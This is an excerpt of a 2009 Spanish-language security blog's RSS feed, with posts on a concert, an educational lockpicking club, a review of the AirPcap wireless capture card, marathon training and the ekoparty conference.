italic;"&gt;"El Arte de la Elegancia de LFC"&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Inesperadamente, unas horas antes del recital cayeron a mis manos 2 entradas para el VIP del recital!! y hacia alli partimos con el amigo Cinic.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_8alnjaETaog/StPui7cY70I/AAAAAAAADTw/x8gfXS2Px50/s1600-h/DSC03665.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 300px;" src="http://1.bp.blogspot.com/_8alnjaETaog/StPui7cY70I/AAAAAAAADTw/x8gfXS2Px50/s400/DSC03665.JPG" alt="" id="BLOGGER_PHOTO_ID_5391915462732345154" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;El recital estuvo verdaderamente excelente!! no recuerdo la ultima vez que vi a Los Cadillacs en vivo, pero puedo decir que no han perdido su magia :-)&lt;br /&gt;&lt;br /&gt;El siguiente es uno de los momentos interesantes del recital, en donde Vicentico hace referencia a un problema que hay con los vecinos de la zona que siempre se quejan por los ruidos molestos que generan los recitales que se hacen en ese estadio.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;object width="320" height="266" class="BLOG_video_class" id="BLOG_video-ceebb850093499b3" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"&gt;&lt;param name="movie" value="http://www.blogger.com/img/videoplayer.swf?videoUrl=http%3A%2F%2Fvp.video.google.com%2Fvideodownload%3Fversion%3D0%26secureurl%3DqAAAAHZQAKfu6jF-JfdYz_38Vlj58rzRKwvtoh3CoFIvlfoZCkJbfQfap3aceCipsAIbJ-NR2tS9bnChuBedJrRIOdBWHnEUYn3BHtfBw6Wd5CR6DQO4rcAsNYfUo0TMAAD9YEZol2rXmk4dIdz-DeNG9ZuCdBVaiHoBtF-ODHvjuCinrznch8xx_MwuvgbrVDoLxclUsRS5HKtgqwQiSDUj83FY10N6jUFf-thynnkzLeiB%26sigh%3Dsh6xbYdGC7t6K9oJwJp4j_fCh3g%26begin%3D0%26len%3D86400000%26docid%3D0&amp;amp;nogvlm=1&amp;amp;thumbnailUrl=http%3A%2F%2Fvideo.google.com%2FThumbnailServer2%3Fapp%3Dblogger%26contentid%3Dceebb850093499b3%26offsetms%3D5000%26itag%3Dw320%26sigh%3DKDRFFxP1ddBWawqyxBtaP-hwl_k&amp;amp;messagesUrl=video.google.com%2FFlashUiStrings.xlb%3Fframe%3Dflashstrings%26hl%3Den"&gt;
&lt;param name="bgcolor" value="#FFFFFF"&gt;
&lt;embed width="320" height="266" src="http://www.blogger.com/img/videoplayer.swf?videoUrl=http%3A%2F%2Fvp.video.google.com%2Fvideodownload%3Fversion%3D0%26secureurl%3DqAAAAHZQAKfu6jF-JfdYz_38Vlj58rzRKwvtoh3CoFIvlfoZCkJbfQfap3aceCipsAIbJ-NR2tS9bnChuBedJrRIOdBWHnEUYn3BHtfBw6Wd5CR6DQO4rcAsNYfUo0TMAAD9YEZol2rXmk4dIdz-DeNG9ZuCdBVaiHoBtF-ODHvjuCinrznch8xx_MwuvgbrVDoLxclUsRS5HKtgqwQiSDUj83FY10N6jUFf-thynnkzLeiB%26sigh%3Dsh6xbYdGC7t6K9oJwJp4j_fCh3g%26begin%3D0%26len%3D86400000%26docid%3D0&amp;amp;nogvlm=1&amp;amp;thumbnailUrl=http%3A%2F%2Fvideo.google.com%2FThumbnailServer2%3Fapp%3Dblogger%26contentid%3Dceebb850093499b3%26offsetms%3D5000%26itag%3Dw320%26sigh%3DKDRFFxP1ddBWawqyxBtaP-hwl_k&amp;amp;messagesUrl=video.google.com%2FFlashUiStrings.xlb%3Fframe%3Dflashstrings%26hl%3Den" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;
&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Excelente haber terminado el fin de semana largo de esta forma ;-)&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-2712842537815532373?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/AojZ_LLxEug" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/AojZ_LLxEug/el-arte-de-la-elegancia.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_8alnjaETaog/StPui7cY70I/AAAAAAAADTw/x8gfXS2Px50/s72-c/DSC03665.JPG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/10/el-arte-de-la-elegancia.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-2304830778500180954</guid><pubDate>Fri, 09 Oct 2009 13:40:00 +0000</pubDate><atom:updated>2009-10-28T14:52:45.754-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">LockPicking</category><title>The Lockpicking Club</title><description>&lt;div style="text-align: justify;"&gt;The first rule of Lockpicking Club is, you do not talk about Lockpicking Club.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_8alnjaETaog/Ss89gzfoivI/AAAAAAAADTo/a2kpGiHGslY/s1600-h/fight_club_by_spade13th.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 267px; height: 400px;" src="http://1.bp.blogspot.com/_8alnjaETaog/Ss89gzfoivI/AAAAAAAADTo/a2kpGiHGslY/s400/fight_club_by_spade13th.jpg" alt="" id="BLOGGER_PHOTO_ID_5390594912773769970" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;El amigo Augusto Pereyra fundo el primer Club de Lockpicking argentino, lo cual me parece muy interesante para que todos los profesionales de seguridad tomemos conciencia sobre la importancia de la seguridad física.&lt;br /&gt;&lt;br /&gt;Me contaba Augusto que la idea de que el Club sea privado se debe a que no es la idea capacitar "cacos" en el arte de abrir cerraduras, lo cual comparto totalmente. Mientras tanto yo ya recibi mi primer juego de ganzúas gratis y finalmente pude abrir algunos candados! ;-)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;A continuación les copio una descripción sobre el Club de Lockpicking que me envio Augusto:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;La finalidad de este club es la de entrenar a sus miembros en el arte de apertura de cerraduras con fines educativos, y esta orientado a personas interesados en la seguridad física o la cerrajería. El conocimiento es transmitido de persona a persona y la intención no es la de realizar grandes reuniones con todos los miembros que generalmente serán de a 3.&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;&lt;br /&gt;Para formar parte hay que ser recomendado por un socio y poseer un candado o cerradura perteneciente al catalogo oficial del club. La idea es que los candados vayan rotando por todos los miembros del club para que todos puedan abrir todos. Una vez que un miembro abre un candado delante de los otros 2 de la reunión se certifica que puede abrir ese candado y en la planilla de habilidades del miembro se anota el código del candado que abre. No es necesario se un experto para formar parte del club a medida que se intercambien mas candados se incrementara su habilidad hasta lograr abrir el total de los candados.&lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;br /&gt;&lt;br /&gt;Cuantos mas miembros mas cerraduras habrá. Una idea que estoy preparando es la de regalar una palanca y una ganzúa casera a cada miembro hecha por el que recomienda al nuevo miembro. Por ejemplo los primeros 10 miembros los conseguí yo, así que a esos 10 yo les arme una ganzúa y un palanca para que practiquen, la idea es que los demás miembros sigan esta tradición para incentivar el crecimiento del club.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;Por favor cualquier duda sobre el Club de Lockpicking contactense con Augusto a su mail: aepereyra (at) gmail (dot) com&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-2304830778500180954?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/4oHXu3iwVB8" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/4oHXu3iwVB8/lockpicking-club.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_8alnjaETaog/Ss89gzfoivI/AAAAAAAADTo/a2kpGiHGslY/s72-c/fight_club_by_spade13th.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/10/lockpicking-club.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-6418598810780958727</guid><pubDate>Wed, 07 Oct 2009 18:46:00 +0000</pubDate><atom:updated>2009-11-09T19:33:26.020-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Wireless</category><title>Jugando con AirPcap</title><description>&lt;div style="text-align: justify;"&gt;Hace poco, uno de los alumnos de mi COMBAT trainings me presto una placa wireless AirPcap, y después de haber jugado un tiempo con la misma, puedo decir que realmente esta muy buena!&lt;br /&gt;&lt;br /&gt;Aquí les dejo algunos comentarios, pero aclaro que estoy lejos de ser un experto en wireless y estas son simplemente las notas de un usuario. n00b! :P&lt;br /&gt;&lt;br /&gt;Las placas AirPcap pertenecen al portfolio de productos de la empresa &lt;a href="http://www.cacetech.com/"&gt;CACE Technologies&lt;/a&gt;, quienes actualmente sponsorean el desarrollo de Wireshark y WinPcap.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_8alnjaETaog/Sszi5GkWQOI/AAAAAAAADTg/pa4nehZRSk4/s1600-h/airpcap_01.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 300px;" src="http://1.bp.blogspot.com/_8alnjaETaog/Sszi5GkWQOI/AAAAAAAADTg/pa4nehZRSk4/s400/airpcap_01.JPG" alt="" id="BLOGGER_PHOTO_ID_5389932324699128034" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Lo especial de estas placas es que te permiten capturar e inyectar paquetes en Windows! Esta placa en particular es el modelo AirPcap Ex que tiene un costo de 498USD! A continuación pueden ver algunas de sus features:&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_8alnjaETaog/SszixbuG_dI/AAAAAAAADTY/jrY-jAOIN98/s1600-h/airpcap_02.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 271px;" src="http://2.bp.blogspot.com/_8alnjaETaog/SszixbuG_dI/AAAAAAAADTY/jrY-jAOIN98/s400/airpcap_02.png" alt="" id="BLOGGER_PHOTO_ID_5389932192938261970" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Obviamente esta placa esta totalmente soportada por Wireshark, y algo que realmente me fascino fue la posibilidad de capturar la señal de radio completa. Estas placas pueden capturar trafico 802.11a/b/g a bajo nivel, incluyendo frames de datos, de control y de management.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_8alnjaETaog/SszisfVNOCI/AAAAAAAADTQ/X5egwZxWSCk/s1600-h/airpcap_03.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 103px;" src="http://1.bp.blogspot.com/_8alnjaETaog/SszisfVNOCI/AAAAAAAADTQ/X5egwZxWSCk/s400/airpcap_03.png" alt="" id="BLOGGER_PHOTO_ID_5389932108008208418" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Opciones de captura de la placa:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_8alnjaETaog/Sszimw6LikI/AAAAAAAADTI/h6iPmZV6vkc/s1600-h/airpcap_04.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 243px;" src="http://1.bp.blogspot.com/_8alnjaETaog/Sszimw6LikI/AAAAAAAADTI/h6iPmZV6vkc/s400/airpcap_04.png" alt="" id="BLOGGER_PHOTO_ID_5389932009647475266" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Capturando frames 802.11:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_8alnjaETaog/Sszia7ZevcI/AAAAAAAADTA/pg4Z34I9aGM/s1600-h/airpcap_05.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 120px;" src="http://4.bp.blogspot.com/_8alnjaETaog/Sszia7ZevcI/AAAAAAAADTA/pg4Z34I9aGM/s400/airpcap_05.png" alt="" id="BLOGGER_PHOTO_ID_5389931806304681410" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Las capturas las realiza en un canal a la vez, pero cuando hay mas de un Access Point en el mismo canal, captura el trafico de todos los que encuentren en ese canal.&lt;br /&gt;&lt;br /&gt;Si es necesario monitorear varios canales a la vez, la empresa también provee lo que llaman CACE Multi-Channel Aggregator, que seria una especie de hub USB donde se deben conectar 3 placas AirPcap, lo que nos permitiría realizar esto. Algo muy importante, es que la captura se realizaría de forma "agregada", osea que se generaría un único archivo de captura de trafico, correctamente correlacionado en el tiempo.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_8alnjaETaog/SsziPIfioNI/AAAAAAAADS4/zYW7hOMNPIw/s1600-h/airpcap_06.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 213px;" src="http://1.bp.blogspot.com/_8alnjaETaog/SsziPIfioNI/AAAAAAAADS4/zYW7hOMNPIw/s400/airpcap_06.jpg" alt="" id="BLOGGER_PHOTO_ID_5389931603661332690" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Otro software que soporta completamente AirPcap es Cain &amp;amp; Abel, por lo que es muy sencillo romper WEP y acelerar el cracking de WPA inyectando paquetes. Hasta donde tengo entendido la única placa soportada totalmente por Cain &amp;amp; Abel para hacer todas estas cosas es AirPcap:&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_8alnjaETaog/SsziGMB2aAI/AAAAAAAADSw/jVVtgYRc3JY/s1600-h/airpcap_07.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 243px;" src="http://1.bp.blogspot.com/_8alnjaETaog/SsziGMB2aAI/AAAAAAAADSw/jVVtgYRc3JY/s400/airpcap_07.png" alt="" id="BLOGGER_PHOTO_ID_5389931449991718914" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Finalizando, me quedo con mi placa EUSSO con chip Atheros de 25USD y a full con aircrack en BT, pero si tuviera el dinero para comprarme la AirPcap lo haria!&lt;br /&gt;&lt;br /&gt;Si alguien tiene algo mas para aportar sobre estas placas bienvenido.&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-6418598810780958727?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/mAvCrsqnivE" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/mAvCrsqnivE/jugando-con-airpcap.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_8alnjaETaog/Sszi5GkWQOI/AAAAAAAADTg/pa4nehZRSk4/s72-c/airpcap_01.JPG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">4</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/10/jugando-con-airpcap.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-5772322095715636772</guid><pubDate>Mon, 28 Sep 2009 17:30:00 +0000</pubDate><atom:updated>2009-09-28T14:41:38.328-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Running</category><title>Seguime en Twitter!</title><description>&lt;div style="text-align: justify;"&gt;Faltan 12 dias para el &lt;a href="http://www.maratondebuenosaires.com/"&gt;Maraton de Buenos Aires&lt;/a&gt; y tengo planeada twittearla a lo largo de cada uno de sus 42km. &lt;span style="font-weight: bold;"&gt;Seguime en Twitter!&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_8alnjaETaog/SsDzc1R2M8I/AAAAAAAADR4/PfRsK1JOP98/s1600-h/twitter-logo_0001.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 85px; height: 85px;" src="http://4.bp.blogspot.com/_8alnjaETaog/SsDzc1R2M8I/AAAAAAAADR4/PfRsK1JOP98/s200/twitter-logo_0001.png" alt="" id="BLOGGER_PHOTO_ID_5386572830998934466" border="0" /&gt;&lt;/a&gt;&lt;span style="font-size:180%;"&gt;&lt;br /&gt;    &lt;a style="font-weight: bold;" href="http://twitter.com/kfs"&gt;http://twitter.com/kfs&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Algo que descubri recientemente, es que irte 10 dias a Las Vegas y organizar una conferencia de seguridad no es lo mas recomendable cuando estas entrenando para correr tu primer maraton...&lt;br /&gt;&lt;br /&gt;Igualmente estoy muy entusiasmado con la posibilidad de correr mis primeros 42km y 192m(distancia oficial del maraton), y como parte de mi campaña para que los &lt;span style="font-weight: bold;"&gt;Geeks CORRAN!&lt;/span&gt; voy a hacer un twitt a cada kilómetro. Después contare mas detalles técnicos de como voy a hacer esto ;-)&lt;br /&gt;&lt;br /&gt;Mientras tanto les dejo un video de mis entrenamientos diarios:&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.adidasla.com/micros/argentina/convocatoria42k/?video=v0909241253827817"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 296px;" src="http://2.bp.blogspot.com/_8alnjaETaog/SsDy63pAe4I/AAAAAAAADRw/8GWaTjNNLys/s400/Picture+5.png" alt="" id="BLOGGER_PHOTO_ID_5386572247517395842" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Geeks Runners! que creen... ¿ realidad o fantasía ?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-5772322095715636772?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/bS30jegAkPA" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/bS30jegAkPA/seguime-en-twitter.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_8alnjaETaog/SsDzc1R2M8I/AAAAAAAADR4/PfRsK1JOP98/s72-c/twitter-logo_0001.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/09/seguime-en-twitter.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-6783082266387056855</guid><pubDate>Mon, 28 Sep 2009 12:48:00 +0000</pubDate><atom:updated>2009-09-28T09:51:28.593-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">ekoparty</category><title>Video de la ekoparty en Clarin</title><description>&lt;div style="text-align: center;"&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/T-79YG4uEKA&amp;amp;hl=en&amp;amp;fs=1&amp;amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/T-79YG4uEKA&amp;amp;hl=en&amp;amp;fs=1&amp;amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-6783082266387056855?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/1OUWmWYbZ24" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/1OUWmWYbZ24/video-de-la-ekoparty-en-clarin.html</link><author>noreply@blogger.com (KungFooSion)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/09/video-de-la-ekoparty-en-clarin.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-359536726642412488</guid><pubDate>Sun, 20 Sep 2009 14:57:00 +0000</pubDate><atom:updated>2009-10-09T17:26:02.980-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">ekoparty</category><title>ekoparty 2009 un Exito!</title><description>&lt;div style="text-align: justify;"&gt;Finalmente termino la ekoparty y por todos los comentarios y felicitaciones recibidas podemos decir que fue todo un exito! :-)&lt;br /&gt;&lt;br /&gt;Es muy difícil para mi hablar objetivamente sobre la ekoparty porque conozco todo el trabajo que hay detrás, prácticamente los últimos 3 meses dedicamos una importante parte de nuestro tiempo a este proyecto y las ultimas 3 semanas estuvimos dedicados a esto casi exclusivamente. Es increíble que todo este trabajo transcurrió en solo 2 dias de la conferencia!&lt;br /&gt;&lt;br /&gt;Fue muy importante toda la ayuda que recibimos de la gente que nos rodea, sin el apoyo y la ayuda practica de muchos amigos seria imposible hacer la ekoparty... mil gracias a todos!!!&lt;br /&gt;&lt;br /&gt;Hay tanto para decir de la ekoparty que sinceramente no puedo decir nada mas, con lo único que me quedo, es que después de esta ekoparty 2009 podemos afirmar que no tenemos nada que envidiarle a ninguna conferencia del mundo! ;-)&lt;br /&gt;&lt;br /&gt;Como todos saben, las dos primeras ediciones de la ekoparty fueron reuniones privadas que se hicieron por el año 2000 y luego la ekoparty resurgió como el evento publico que conocemos hoy en dia. Tambien me sorprende que muchos de los amigos con los que nos reuniamos diez años atras, hoy nos sigamos reencontrando en la ekoparty, pero ya como profesionales de seguridad... :-D&lt;br /&gt;&lt;br /&gt;A modo de curiosidad, esta es la única foto que hay de la ekoparty #1 que se hizo por el año 2000:&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_8alnjaETaog/SrZDuZBLQXI/AAAAAAAADD4/Obq24hgOWe8/s1600-h/ekoparty_1.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 268px; height: 400px;" src="http://1.bp.blogspot.com/_8alnjaETaog/SrZDuZBLQXI/AAAAAAAADD4/Obq24hgOWe8/s400/ekoparty_1.jpg" alt="" id="BLOGGER_PHOTO_ID_5383564868836868466" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-359536726642412488?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/Wa3Fv5bsr7Q" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/Wa3Fv5bsr7Q/ekoparty-2009-un-exito.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_8alnjaETaog/SrZDuZBLQXI/AAAAAAAADD4/Obq24hgOWe8/s72-c/ekoparty_1.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">4</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/09/ekoparty-2009-un-exito.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-4789580499661870472</guid><pubDate>Wed, 16 Sep 2009 18:29:00 +0000</pubDate><atom:updated>2009-10-13T18:22:50.890-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Trainings</category><title>ekoparty NINJAS</title><description>&lt;div style="text-align: justify;"&gt;Durante el Lunes y Martes un nuevo grupo de Ninjas tomo el COMBAT training en la semana de la ekoparty!&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_8alnjaETaog/SrEvHX1ANpI/AAAAAAAADDw/J12QtPhJYdw/s1600-h/DSC03541.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 244px;" src="http://1.bp.blogspot.com/_8alnjaETaog/SrEvHX1ANpI/AAAAAAAADDw/J12QtPhJYdw/s400/DSC03541.JPG" alt="" id="BLOGGER_PHOTO_ID_5382134833386370706" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Quiero felicitarlos a todos por el excelente trabajo!! y especialmente a Bruno Di Lorenzo Sainz por ganar el CTF!&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_8alnjaETaog/SrEutsLpnkI/AAAAAAAADDo/3TPmoEul-Hs/s1600-h/DSC03543.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 334px;" src="http://3.bp.blogspot.com/_8alnjaETaog/SrEutsLpnkI/AAAAAAAADDo/3TPmoEul-Hs/s400/DSC03543.JPG" alt="" id="BLOGGER_PHOTO_ID_5382134392173469250" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Después de que pase la ekoparty contare mas sobre los trainings y subire las fotos.&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-4789580499661870472?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/6bGRPIfdVNo" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/6bGRPIfdVNo/ekoparty-ninjas.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_8alnjaETaog/SrEvHX1ANpI/AAAAAAAADDw/J12QtPhJYdw/s72-c/DSC03541.JPG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/09/ekoparty-ninjas.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-483442466966802013</guid><pubDate>Fri, 11 Sep 2009 01:59:00 +0000</pubDate><atom:updated>2009-09-10T23:05:42.726-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Presentation</category><title>Fundar sin Fundir</title><description>&lt;div style="text-align: justify;"&gt;Este es un video de solo 5 minutos de &lt;a href="http://damianvoltes.com/"&gt;Damian Voltes&lt;/a&gt;, un emprendedor serial, en donde brevemente relata las claves para fundar una empresa y no fundirla en el intento.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/igU3H_nG2rg&amp;amp;rel=0&amp;amp;color1=0xb1b1b1&amp;amp;color2=0xcfcfcf&amp;amp;feature=player_embedded&amp;amp;fs=1"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowScriptAccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/igU3H_nG2rg&amp;amp;rel=0&amp;amp;color1=0xb1b1b1&amp;amp;color2=0xcfcfcf&amp;amp;feature=player_embedded&amp;amp;fs=1" type="application/x-shockwave-flash" allowfullscreen="true" 